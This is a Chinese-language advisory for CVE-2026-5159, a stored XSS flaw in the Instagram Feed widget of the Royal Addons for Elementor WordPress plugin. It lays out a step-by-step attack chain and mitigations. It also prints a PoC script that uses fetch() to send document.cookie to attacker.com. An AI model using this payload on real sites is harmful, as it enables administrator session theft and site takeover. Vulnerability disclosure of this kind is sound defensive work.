CVE-2026-5159 CVSS 6.4 中危

CVE-2026-5159 Royal Addons插件存储型XSS漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5159

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Royal Addons for Elementor (WordPress Plugin)

漏洞概述

WordPress的Royal Addons for Elementor插件在1.7.1056及之前版本中存在存储型XSS漏洞。该漏洞源于Instagram Feed组件的'instagram_follow_text'设置缺乏足够的输入清理和输出转义。具有Contributor及以上权限的认证攻击者可利用此漏洞注入任意Web脚本。当用户访问被注入的页面时，脚本将执行。利用此漏洞要求管理员先前已在站点上使用有效的Instagram访问令牌配置了Instagram Feed小部件。

技术细节

该漏洞位于Royal Addons插件的Instagram Feed小部件处理逻辑中，具体涉及'instagram_follow_text'参数。由于代码未对用户提供的数据进行严格的输入验证和上下文相关的输出编码，导致反射型注入转变为存储型风险。攻击流程首先要求管理员已启用Instagram Feed并配置了有效Token。随后，拥有Contributor权限的攻击者可以编辑包含该小部件的页面，将恶意JavaScript Payload注入到'instagram_follow_text'字段。保存后，Payload被持久化存储在数据库中。当其他用户访问该页面时，服务器端直接输出未经转义的内容，导致受害者的浏览器执行恶意脚本。这可能允许攻击者窃取管理员Session ID，进而完全接管网站管理权限。

攻击链分析

STEP 1

1. 前期侦察

识别目标网站是否使用了Royal Addons for Elementor插件且版本小于等于1.7.1056，并确认Instagram Feed组件已启用。

STEP 2

2. 获取权限

通过弱口令猜测、社会工程学或其他方式获取一个Contributor（投稿者）及以上级别的WordPress账户凭证。

STEP 3

3. 注入Payload

登录后台，编辑包含Instagram Feed小部件的页面，将恶意脚本注入到'instagram_follow_text'设置中并保存。

STEP 4

4. 触发漏洞

诱导管理员或其他高权限用户访问包含该恶意小部件的页面。

STEP 5

5. 执行攻击

受害者的浏览器解析并执行恶意脚本，攻击者可借此窃取Cookie或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-5159
Inject this payload into the 'instagram_follow_text' parameter of the Instagram Feed widget.
-->
<script>
  // Example: Steal administrator cookies
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
  alert('XSS Vulnerability Exploited');
</script>

影响范围

Royal Addons for Elementor <= 1.7.1056

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Instagram Feed小部件功能，或者在Web服务器层面实施严格的输入过滤规则，拦截包含<script>标签或常见JavaScript事件的请求。同时，管理员应审查网站内容，确保没有被恶意用户植入的代码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表